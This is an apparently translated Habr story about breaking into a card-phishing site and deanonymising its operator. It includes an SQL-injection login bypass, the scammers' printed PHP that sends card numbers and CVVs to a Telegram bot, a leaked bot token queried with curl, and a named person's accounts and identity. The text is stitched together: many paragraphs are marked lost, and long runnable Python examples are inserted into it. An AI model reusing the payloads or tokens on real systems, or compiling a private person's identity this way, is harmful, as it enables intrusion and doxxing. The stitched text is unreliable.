
How I caught a hacker

Annotation


Any of us can become the victim of an attacker, but sometimes predator and prey trade places.

This is a short story of how careless use of technology can lead to one's identity being exposed. The article will be useful both to young hackers chasing "easy money" and to those who want to catch them.

Introduction


One February evening I was looking for a venue for a romantic date with my beloved. After a while my attention was caught by the site milleniumfilm.ru (no longer available). It offered small private cinemas for rent. Nice pictures, reasonable prices, online support; the one catch was that bank card details were to be entered on a page of the same domain served without HTTPS. Wary, I wrote to the site's technical support, and the scammers quickly got the picture: realising that I was technically competent, they told me, in three letters, where to go. Of course, fraudsters have no reason to waste time on me, but why so rude? Whatever the situation, one should stay decent.
Reviews of sites of the same kind can be found at zhaloba-online.ru. Some of them are even still running.

Breaking in


Feeling the injustice of the world, and wanting to identify the attacker and put a stop to his activity, I started examining the site for vulnerabilities. A shot in the dark: the very first address I typed in led me to the admin panel, which politely asked me for a "Login" and "Password".

Screenshot

My first attempt was an SQL injection, using the first password that came to mind:

1' or '1
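Why that string opens a login form, as an added example (not code from the article or from the site): a query assembled by string concatenation next to its parameterised form, run against a constructed in-memory SQLite table. The table schema, the column names and the stored password are assumptions; the article shows only the login form, not the site's backend, which was presumably PHP, so Python is used here simply so the example can be run.

```python
import sqlite3

# Constructed stand-in for the admin panel's user table (assumption: the
# real schema is unknown; the article only shows the login form).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (login TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'hunter2')")
    return conn


def vulnerable_sql(login: str, password: str) -> str:
    # The classic mistake: user input is pasted into the SQL text, so a
    # single quote in the input ends the string literal early and the rest
    # of the input becomes SQL.
    return ("SELECT login FROM admins WHERE login = '" + login
            + "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, login: str, password: str) -> bool:
    return conn.execute(vulnerable_sql(login, password)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, login: str, password: str) -> bool:
    # Parameterised query: the driver passes the values separately from the
    # SQL text, so quotes in the input can never change the query structure.
    # (A real fix also stores a password hash rather than the password.)
    sql = "SELECT login FROM admins WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone() is not None


PAYLOAD = "1' or '1"

if __name__ == "__main__":
    db = make_db()
    # With the payload in both fields the WHERE clause becomes
    #   login = '1' or '1' AND password = '1' or '1'
    # AND binds tighter than OR, so the trailing  or '1'  is always true
    # and the first admin row comes back whatever the credentials are.
    print(vulnerable_sql(PAYLOAD, PAYLOAD))
    print("vulnerable, payload:   ", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("safe, payload:         ", login_safe(db, PAYLOAD, PAYLOAD))
    print("safe, real credentials:", login_safe(db, "admin", "hunter2"))
```

The same input also works with a known login and the payload only in the password field, which is what the article's "first password that came to mind" amounts to; the parameterised version treats the whole string as a literal password and rejects it.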

[Lost in extraction: the paragraphs between the login bypass and the listing of telegram.php. Surviving fragments mention Gelloiss.ru, card data including cvc2, 3D-Secure, a php-shell, the /images/ directory and login.php.]

$ cat telegram.php
<?
function send_mess($text) {
  $token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
  $mess = $text;
  $chat = "-302359340";
  /*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
  file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}

The PHP function send_mess is called from two places (grep over the site's source):

grep
./cart.php:22:send_mess(" : ".$name."%0D%0AEmail: ".$email."%0D%0A: ".$phone."%0D%0A : ".$date."%0D%0A".": ".$time."%0D%0A: ".$city."%0D%0A: ".$sum."%0D%0A  : ".$services."%0D%0AIP: ".$ip."%0D%0A: ".$link_ban_ip);
./pay/ms.php:21:  send_mess(": ".$sum."%0D%0A  : ".$name."%0D%0A : ".$num."%0D%0A , : ".$month."%0D%0A: ".$year."%0D%0Acvv: ".$cvv);
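Finding this kind of exfiltration channel in a site's source tree, as an added example (not the author's tooling): a small scanner that pulls hardcoded Telegram bot tokens and chat ids out of PHP files, flags send_mess calls that ship card fields, and assembles the getChatAdministrators URL that the curl call further down uses. The input is a constructed in-memory tree: telegram.php as printed above, plus the two call sites placed on the line numbers grep reported; the Russian labels inside those strings were lost in extraction, so generic English ones are used. The token shape (numeric bot id, colon, 35 characters of [A-Za-z0-9_-]) is Telegram's; the list of "card" variable names is an assumption based on the grep hits.

```python
import re
from typing import Dict

# Telegram bot tokens look like "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>".
TOKEN_RE = re.compile(r"\b(\d{6,12}:[A-Za-z0-9_-]{35})\b")
# The chat id assignment as written in telegram.php; group chats are negative.
CHAT_RE = re.compile(r'\$chat\s*=\s*"(-?\d+)"')
# Variables that must never leave the server in clear text (assumed names,
# taken from the grep hits above).
CARD_FIELDS = re.compile(r"\$(cvv|cvc2?|num|card|pan|month|year)\b", re.IGNORECASE)
SEND_RE = re.compile(r"\bsend_mess\s*\(")

# Constructed sample tree standing in for the site's webroot.
SAMPLE_TREE: Dict[str, str] = {
    "telegram.php": "\n".join([
        "<?",
        "function send_mess($text) {",
        '  $token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";',
        "  $mess = $text;",
        '  $chat = "-302359340";',
        '  file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);',
        "}",
    ]),
    # Call sites padded so they land on the lines grep reported (22 and 21).
    "cart.php": "<?php" + "\n" * 21
        + 'send_mess("Name: ".$name."%0D%0AEmail: ".$email."%0D%0AIP: ".$ip);',
    "pay/ms.php": "<?php" + "\n" * 20
        + 'send_mess("Sum: ".$sum."%0D%0ACard: ".$num."%0D%0AMonth: ".$month."%0D%0AYear: ".$year."%0D%0Acvv: ".$cvv);',
}


def scan_tree(tree: Dict[str, str]) -> dict:
    """Walk path->source pairs; report hardcoded tokens, chat ids and
    send sites that include card fields, each as (path, line, value)."""
    report = {"tokens": [], "chat_ids": [], "leaks": []}
    for path, src in tree.items():
        for lineno, line in enumerate(src.splitlines(), 1):
            for tok in TOKEN_RE.findall(line):
                report["tokens"].append((path, lineno, tok))
            for chat in CHAT_RE.findall(line):
                report["chat_ids"].append((path, lineno, chat))
            if SEND_RE.search(line):
                fields = sorted({f.lower() for f in CARD_FIELDS.findall(line)})
                if fields:
                    report["leaks"].append((path, lineno, fields))
    return report


def admins_url(token: str, chat_id: str) -> str:
    # Whoever holds the token can act as the bot.  This Bot API method lists
    # the chat's administrators, which is what exposed the operator's account.
    return f"https://api.telegram.org/bot{token}/getChatAdministrators?chat_id={chat_id}"


if __name__ == "__main__":
    found = scan_tree(SAMPLE_TREE)
    for kind, hits in found.items():
        for hit in hits:
            print(f"{kind:8s} {hit[0]}:{hit[1]}  {hit[2]}")
    for _, _, tok in found["tokens"]:
        for _, _, chat in found["chat_ids"]:
            print("lookup:", admins_url(tok, chat))
```

Run against a real webroot, the same three regexes over `Path.rglob("*.php")` give a first-pass inventory of where card data is leaving the box and which tokens to report; the scanner only builds the lookup URL and never contacts the API itself.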

[Lost in extraction: text mentioning the chat_id, the Skype name «ura7887» and the Telegram name «Gelloiss».]

gelloiss.ru

curl
$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}

The chat's creator has the username «Gelloiss».


So far we have: the nicknames «gelloiss» and «ura7887», the domain «Gelloiss.ru» and the Skype account «ura7887».

[Lost in extraction: the paragraphs that follow; surviving fragments mention a vk.com profile, anime.anidub.com and blackhacker.ru.]


Telegram


[Lost in extraction: a paragraph about Gelloiss.ru and Telegram.]

shell
$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8  -

In Telegram: a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8.
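A detail anyone verifying that digest later needs, shown as an added example (not the author's code): a bash here-string (`<<<`) appends a newline before sha256sum reads its input, so the published digest covers "i'm carder yuri iskra." plus a trailing newline, not the bare sentence. The helper below checks a revealed sentence against a published digest in both encodings. The digest and sentence are the ones from the article; the function names are mine.

```python
import hashlib

# Digest as posted in the article, i.e. the output of
#   sha256sum <<< "i'm carder yuri iskra."
PAGE_DIGEST = "a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8"
SENTENCE = "i'm carder yuri iskra."


def commit(message: bytes) -> str:
    """Hex SHA-256 of the exact bytes: publish this now, reveal `message` later."""
    return hashlib.sha256(message).hexdigest()


def verify_reveal(message: str, digest: str) -> dict:
    """Check a revealed sentence against a published digest.

    Returns, per encoding, whether it reproduces the digest.  A bash
    here-string feeds "text\n" to sha256sum, so a reveal that omits the
    newline will not match even though the words are identical.
    """
    candidates = {
        "as-is": message.encode(),
        "with trailing newline": (message + "\n").encode(),  # what <<< produces
    }
    return {name: commit(data) == digest.lower() for name, data in candidates.items()}


if __name__ == "__main__":
    for form, ok in verify_reveal(SENTENCE, PAGE_DIGEST).items():
        print(f"{form:22s} -> {'matches' if ok else 'no match'}")
```

The safer habit when publishing such a commitment is `printf '%s' "text" | sha256sum`, which hashes exactly the bytes you intend and leaves nothing for the verifier to guess.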

Telegram


[Lost in extraction: two paragraphs; the figures 100 and +100 appear in the original.]



[Lost in extraction: the closing paragraph; the original mentions the figures 3-13 and 2 and the domain moneyonline.world.]

Update 2019-04-21: gelloiss [rest of the sentence lost in extraction]; the exchange as dumped from Telegram:
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message=' « » ', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

Source: https://habr.com/ru/post/448810/

